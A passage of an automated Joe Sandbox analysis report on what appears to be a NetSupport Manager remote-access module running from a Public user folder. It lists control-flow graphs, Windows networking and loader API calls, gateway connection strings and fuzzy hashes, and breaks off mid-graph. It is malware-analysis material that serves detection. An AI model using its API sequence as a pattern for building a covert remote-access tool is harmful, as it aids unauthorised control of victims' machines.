                                                                                          control_flow_graph 992 6c5e7030-6c5e7050 call 6c5d2a90 call 6c5edbd0 997 6c5e7097 992->997 998 6c5e7052-6c5e7095 LoadLibraryA 992->998 999 6c5e7099-6c5e70f8 call 6c5d8d00 InitializeCriticalSection CreateEventA 997->999 998->999 1002 6c5e70fa-6c5e710e call 6c5d6f50 999->1002 1003 6c5e7111-6c5e711e CreateEventA 999->1003 1002->1003 1005 6c5e7137-6c5e7144 CreateEventA 1003->1005 1006 6c5e7120-6c5e7134 call 6c5d6f50 1003->1006 1009 6c5e715d-6c5e7170 WSAStartup 1005->1009 1010 6c5e7146-6c5e715a call 6c5d6f50 1005->1010 1006->1005 1011 6c5e7172-6c5e7182 call 6c5d5290 call 6c5d2b70 1009->1011 1012 6c5e7183-6c5e71b2 call 6c5f1b69 1009->1012 1010->1009 1021 6c5e71b4-6c5e71cd call 6c5d6f50 1012->1021 1022 6c5e71d0-6c5e71e4 call 6c5f1c50 1012->1022 1021->1022 1028 6c5e71fa-6c5e7202 1022->1028 1029 6c5e71e6-6c5e71e9 1022->1029 1031 6c5e7209-6c5e7223 call 6c5f3753 1028->1031 1032 6c5e7204 1028->1032 1029->1028 1030 6c5e71eb-6c5e71f1 1029->1030 1030->1028 1033 6c5e71f3-6c5e71f8 1030->1033 1036 6c5e723c-6c5e7255 call 6c5e9bf0 1031->1036 1037 6c5e7225-6c5e7239 call 6c5d6f50 1031->1037 1032->1031 1033->1031 1042 6c5e726a-6c5e7271 call 6c5d5730 1036->1042 1043 6c5e7257-6c5e725e 1036->1043 1037->1036 1047 6c5e730b-6c5e7310 1042->1047 1048 6c5e7277-6c5e729a call 6c5f1b69 1042->1048 1045 6c5e7260-6c5e7268 1043->1045 1045->1042 1045->1045 1050 6c5e731e-6c5e7336 call 6c5d5e90 call 6c5d5530 1047->1050 1051 6c5e7312-6c5e7315 1047->1051 1055 6c5e72be-6c5e72dc call 6c5f1c50 call 6c5f1b69 1048->1055 1056 6c5e729c-6c5e72bb call 6c5d6f50 1048->1056 1057 6c5e7339-6c5e7354 call 6c5d5e90 1050->1057 1051->1050 1052 6c5e7317-6c5e731c 1051->1052 1052->1050 1052->1057 1076 6c5e72de-6c5e72f7 call 6c5d6f50 1055->1076 1077 6c5e72fa-6c5e7308 call 6c5f1c50 1055->1077 1056->1055 1068 6c5e7356-6c5e735c 1057->1068 1069 6c5e7361-6c5e738b GetTickCount CreateThread 1057->1069 1068->1069 1070 6c5e738d-6c5e73a6 call 6c5d6f50 1069->1070 1071 6c5e73a9-6c5e73b6 SetThreadPriority 1069->1071 1070->1071 1074 6c5e73cf-6c5e73ed call 6c5d5f20 call 6c5d5e90 1071->1074 1075 6c5e73b8-6c5e73cc call 6c5d6f50 1071->1075 1089 6c5e73ef 1074->1089 1090 6c5e73f5-6c5e73f7 1074->1090 1075->1074 1076->1077 1077->1047 1089->1090 1091 6c5e73f9-6c5e7407 call 6c5edbd0 1090->1091 1092 6c5e7425-6c5e7447 GetModuleFileNameA call 6c5d2420 1090->1092 1097 6c5e741e 1091->1097 1098 6c5e7409-6c5e741c call 6c5d4580 1091->1098 1099 6c5e744c 1092->1099 1100 6c5e7449-6c5e744a 1092->1100 1102 6c5e7420 1097->1102 1098->1102 1103 6c5e7451-6c5e746d 1099->1103 1100->1103 1102->1092 1105 6c5e7470-6c5e747f 1103->1105 1105->1105 1106 6c5e7481-6c5e7486 1105->1106 1107 6c5e7487-6c5e748d 1106->1107 1107->1107 1108 6c5e748f-6c5e74c8 GetPrivateProfileIntA GetModuleHandleA 1107->1108 1109 6c5e74ce-6c5e74fa call 6c5d5e90 * 2 1108->1109 1110 6c5e7563-6c5e758f CreateMutexA timeBeginPeriod 1108->1110 1115 6c5e74fc-6c5e7511 call 6c5d5e90 1109->1115 1116 6c5e7536-6c5e755d call 6c5d5e90 * 2 1109->1116 1121 6c5e752a-6c5e7530 1115->1121 1122 6c5e7513-6c5e7528 call 6c5d5e90 1115->1122 1116->1110 1121->1116 1122->1116 1122->1121
                                                                                          APIs
                                                                                            • Part of subcall function 6C5D2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C5D2ACB
                                                                                            • Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2ADA
                                                                                            • Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2AEA
                                                                                            • Part of subcall function 6C5D2A90: wsprintfA.USER32 ref: 6C5D2B05
                                                                                            • Part of subcall function 6C5EDBD0: _malloc.LIBCMT ref: 6C5EDBE9
                                                                                            • Part of subcall function 6C5EDBD0: wsprintfA.USER32 ref: 6C5EDC04
                                                                                            • Part of subcall function 6C5EDBD0: _memset.LIBCMT ref: 6C5EDC27
                                                                                          • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C5E7057
                                                                                          • InitializeCriticalSection.KERNEL32(6C61B898), ref: 6C5E70DF
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E70EF
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E7115
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E713B
                                                                                          • WSAStartup.WSOCK32(00000101,6C61B91A), ref: 6C5E7167
                                                                                          • _malloc.LIBCMT ref: 6C5E71A3
                                                                                            • Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
                                                                                            • Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
                                                                                            • Part of subcall function 6C5F1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE
                                                                                          • _memset.LIBCMT ref: 6C5E71D3
                                                                                          • _calloc.LIBCMT ref: 6C5E7214
                                                                                          • _malloc.LIBCMT ref: 6C5E728B
                                                                                          • _memset.LIBCMT ref: 6C5E72C1
                                                                                          • _malloc.LIBCMT ref: 6C5E72CD
                                                                                          • _memset.LIBCMT ref: 6C5E7303
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E7361
                                                                                          • CreateThread.KERNEL32(00000000,00004000,6C5E6BA0,00000000,00000000,6C61BACC), ref: 6C5E737E
                                                                                          • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C5E73AC
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\Support\,00000104), ref: 6C5E7430
                                                                                          • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Netstat\Support\pci.ini), ref: 6C5E74B0
                                                                                          • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C5E74C0
                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C5E7566
                                                                                          • timeBeginPeriod.WINMM(00000001), ref: 6C5E7573
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                          • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$506407$C:\Users\Public\Netstat\Support\$C:\Users\Public\Netstat\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                          • API String ID: 3160247386-192133374
                                                                                          • Opcode ID: c51107e4baa493d82e69265bde6dfb213c05a2a8fd6dc4dfa0e5cd014c9599df
                                                                                          • Instruction ID: 0dee276890cdb34187167312b63104ddfd4d8682cb2b258eb1bb316ee71beeed
                                                                                          • Opcode Fuzzy Hash: c51107e4baa493d82e69265bde6dfb213c05a2a8fd6dc4dfa0e5cd014c9599df
                                                                                          • Instruction Fuzzy Hash: 2DD1B4F0A04305AFDB10AF6E8CC695A7BF8EB4A34AF55492AE405D7F41D630AC448F9D
                                                                                          APIs
                                                                                            • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,013FB8D8,000000FF,?), ref: 11144ED5
                                                                                            • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,013FB8D8,000000FF,?), ref: 11144EE5
                                                                                          • _fgets.LIBCMT ref: 11061DC2
                                                                                          • _strpbrk.LIBCMT ref: 11061E29
                                                                                          • _fgets.LIBCMT ref: 11061F2C
                                                                                          • _strpbrk.LIBCMT ref: 11061FA3
                                                                                          • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                          • _fgets.LIBCMT ref: 11062035
                                                                                          • _strpbrk.LIBCMT ref: 1106205B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                          • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                          • API String ID: 716802716-1571441106
                                                                                          • Opcode ID: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                          • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                          • Opcode Fuzzy Hash: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                          • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1920 11143570-111435b1 GetModuleFileNameA 1921 111435f3 1920->1921 1922 111435b3-111435c6 call 11081b40 1920->1922 1923 111435f9-111435fd 1921->1923 1922->1921 1931 111435c8-111435f1 LoadLibraryA 1922->1931 1925 111435ff-1114360c LoadLibraryA 1923->1925 1926 11143619-11143637 GetModuleHandleA GetProcAddress 1923->1926 1925->1926 1928 1114360e-11143616 LoadLibraryA 1925->1928 1929 11143647-11143670 GetProcAddress * 4 1926->1929 1930 11143639-11143645 1926->1930 1928->1926 1932 11143673-111436eb GetProcAddress * 10 call 11161d01 1929->1932 1930->1932 1931->1923 1934 111436f0-111436f3 1932->1934
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,759223A0), ref: 111435A3
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                          • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                          • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                          • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                          • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                          • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                          • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                          • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                          • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                          • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                          • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                            • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                          • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                          • API String ID: 3874234733-2061581830
                                                                                          • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                          • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                          • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                          • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1935 6c5da980-6c5da9e7 call 6c5d5840 1938 6c5da9ed-6c5da9f0 1935->1938 1939 6c5daa9c 1935->1939 1938->1939 1941 6c5da9f6-6c5da9fb 1938->1941 1940 6c5daaa2-6c5daaae 1939->1940 1942 6c5daac6-6c5daacd 1940->1942 1943 6c5daab0-6c5daac5 call 6c5f28e1 1940->1943 1941->1939 1944 6c5daa01-6c5daa06 1941->1944 1945 6c5daacf-6c5daad7 1942->1945 1946 6c5dab48-6c5dab58 socket 1942->1946 1944->1939 1948 6c5daa0c-6c5daa21 EnterCriticalSection 1944->1948 1945->1946 1951 6c5daad9-6c5daadc 1945->1951 1952 6c5dab5a-6c5dab6f WSAGetLastError call 6c5f28e1 1946->1952 1953 6c5dab70-6c5dabc9 #21 * 2 call 6c5d5e90 1946->1953 1949 6c5daa89-6c5daa9a LeaveCriticalSection 1948->1949 1950 6c5daa23-6c5daa2b 1948->1950 1949->1940 1956 6c5daa30-6c5daa39 1950->1956 1951->1946 1957 6c5daade-6c5dab05 call 6c5da5c0 1951->1957 1964 6c5dabe8-6c5dac1f bind 1953->1964 1965 6c5dabcb-6c5dabe3 #21 1953->1965 1960 6c5daa49-6c5daa51 1956->1960 1961 6c5daa3b-6c5daa3f 1956->1961 1972 6c5dab0b-6c5dab2f WSAGetLastError call 6c5d30a0 1957->1972 1973 6c5dad4a-6c5dad69 EnterCriticalSection 1957->1973 1960->1956 1968 6c5daa53-6c5daa5e LeaveCriticalSection 1960->1968 1961->1960 1966 6c5daa41-6c5daa47 1961->1966 1969 6c5dac41-6c5dac49 1964->1969 1970 6c5dac21-6c5dac40 WSAGetLastError closesocket call 6c5f28e1 1964->1970 1965->1964 1966->1960 1971 6c5daa60-6c5daa88 LeaveCriticalSection call 6c5f28e1 1966->1971 1968->1940 1977 6c5dac59-6c5dac64 1969->1977 1978 6c5dac4b-6c5dac57 1969->1978 1986 6c5dae82-6c5dae92 call 6c5f28e1 1972->1986 1989 6c5dab35-6c5dab47 call 6c5f28e1 1972->1989 1979 6c5dad6f-6c5dad7d 1973->1979 1980 6c5dae50-6c5dae80 LeaveCriticalSection GetTickCount InterlockedExchange 1973->1980 1985 6c5dac65-6c5dac83 htons WSASetBlockingHook call 6c5d7610 1977->1985 1978->1985 1981 6c5dad80-6c5dad86 1979->1981 1980->1986 1987 6c5dad88-6c5dad90 1981->1987 1988 6c5dad97-6c5dae0f InitializeCriticalSection call 6c5d8fb0 call 6c5f0ef0 1981->1988 1995 6c5dac88-6c5dac8d 1985->1995 1987->1981 1992 6c5dad92 1987->1992 2010 6c5dae18-6c5dae4b getsockname 1988->2010 2011 6c5dae11 1988->2011 1992->1980 1999 6c5dac8f-6c5dacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c5d30a0 call 6c5f28e1 1995->1999 2000 6c5dacc6-6c5daccd 1995->2000 2001 6c5daccf-6c5dacd6 2000->2001 2002 6c5dad45 WSAUnhookBlockingHook 2000->2002 2001->2002 2005 6c5dacd8-6c5dacfb call 6c5da5c0 2001->2005 2002->1973 2005->2002 2014 6c5dacfd-6c5dad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6c5d30a0 2005->2014 2010->1980 2011->2010 2014->1986 2017 6c5dad32-6c5dad44 call 6c5f28e1 2014->2017
                                                                                          APIs
                                                                                            • Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                          • EnterCriticalSection.KERNEL32(6C61B898,?,00000000,00000000), ref: 6C5DAA11
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA58
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA68
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA94
                                                                                          • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C5DAB0B
                                                                                          • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB4E
                                                                                          • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB5A
                                                                                          • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB8E
                                                                                          • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABB1
                                                                                          • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABE3
                                                                                          • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC18
                                                                                          • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC21
                                                                                          • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC29
                                                                                          • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC65
                                                                                          • WSASetBlockingHook.WSOCK32(6C5D63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC76
                                                                                          • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC8F
                                                                                          • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC96
                                                                                          • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC9C
                                                                                          • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DACFD
                                                                                          • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD04
                                                                                          • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD0A
                                                                                          • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD45
                                                                                          • EnterCriticalSection.KERNEL32(6C61B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD4F
                                                                                          • InitializeCriticalSection.KERNEL32(-6C61CB4A), ref: 6C5DADE6
                                                                                            • Part of subcall function 6C5D8FB0: _memset.LIBCMT ref: 6C5D8FE4
                                                                                            • Part of subcall function 6C5D8FB0: getsockname.WSOCK32(?,?,00000010,?,03682EB0,?), ref: 6C5D9005
                                                                                          • getsockname.WSOCK32(00000000,?,?), ref: 6C5DAE4B
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAE60
                                                                                          • GetTickCount.KERNEL32 ref: 6C5DAE6C
                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DAE7A
                                                                                          Strings
                                                                                          • Cannot connect to gateway %s, error %d, xrefs: 6C5DACA6
                                                                                          • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C5DAD14
                                                                                          • *TcpNoDelay, xrefs: 6C5DABB8
                                                                                          • Connect error to %s using hijacked socket, error %d, xrefs: 6C5DAB17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                          • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                          • API String ID: 692187944-2561115898
                                                                                          • Opcode ID: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
                                                                                          • Instruction ID: fb70bedb50f581ab446862bef5ac2d3b9a14edd6e83d34ccd58adfe83e01b611
                                                                                          • Opcode Fuzzy Hash: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
                                                                                          • Instruction Fuzzy Hash: 5EE18F71A01219DFDB14DF68CC80BDEB3B5EB88305F1141AAE91A97A80DB70AE49CF55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2086 11139090-111390c5 2087 111390d2-111390d9 2086->2087 2088 111390c7-111390cd GetCurrentThreadId 2086->2088 2089 111390e0-111390fc call 11133920 call 11133400 2087->2089 2090 111390db call 11029330 2087->2090 2088->2087 2096 11139102-11139108 2089->2096 2097 111391db-111391e2 2089->2097 2090->2089 2098 1113975a-11139775 call 11161d01 2096->2098 2099 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 2096->2099 2100 1113929a-111392b0 2097->2100 2101 111391e8-111391ef 2097->2101 2139 111391d1 2099->2139 2140 11139171-11139177 2099->2140 2109 111392b6-111392bd 2100->2109 2110 111393ef 2100->2110 2101->2100 2104 111391f5-111391fc 2101->2104 2104->2100 2107 11139202-11139211 FindWindowA 2104->2107 2107->2100 2112 11139217-1113921c IsWindowVisible 2107->2112 2114 111392bf-111392c9 2109->2114 2115 111392ce-111392ee call 1105dd10 2109->2115 2116 111393f1-11139402 2110->2116 2117 11139435-11139440 2110->2117 2112->2100 2113 1113921e-11139225 2112->2113 2113->2100 2119 11139227-1113924c call 11138c30 IsWindowVisible 2113->2119 2114->2117 2115->2117 2136 111392f4-11139323 2115->2136 2121 11139404-11139414 2116->2121 2122 1113941a-1113942f 2116->2122 2123 11139442-11139462 call 1105dd10 2117->2123 2124 11139476-1113947c 2117->2124 2119->2100 2142 1113924e-1113925d IsIconic 2119->2142 2121->2122 2122->2117 2145 11139470 2123->2145 2146 11139464-1113946e call 1102cff0 2123->2146 2126 1113947e-1113948a call 11138c30 2124->2126 2127 1113948d-11139495 2124->2127 2126->2127 2134 111394a7 2127->2134 2135 11139497-111394a2 call 1106b860 2127->2135 2144 111394a7 call 1112ce90 2134->2144 2135->2134 2155 11139325-11139339 call 11081a70 2136->2155 2156 1113933e-11139351 call 11143230 2136->2156 2139->2097 2140->2139 2147 11139179-11139190 call 11146450 GetForegroundWindow 2140->2147 2142->2100 2149 1113925f-1113927a GetForegroundWindow call 11131210 * 2 2142->2149 2151 111394ac-111394b2 2144->2151 2145->2124 2146->2124 2160 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 2147->2160 2161 111391be-111391c0 2147->2161 2194 1113928b-11139294 EnableWindow 2149->2194 2195 1113927c-11139282 2149->2195 2157 111394b4-111394ba call 11131b00 2151->2157 2158 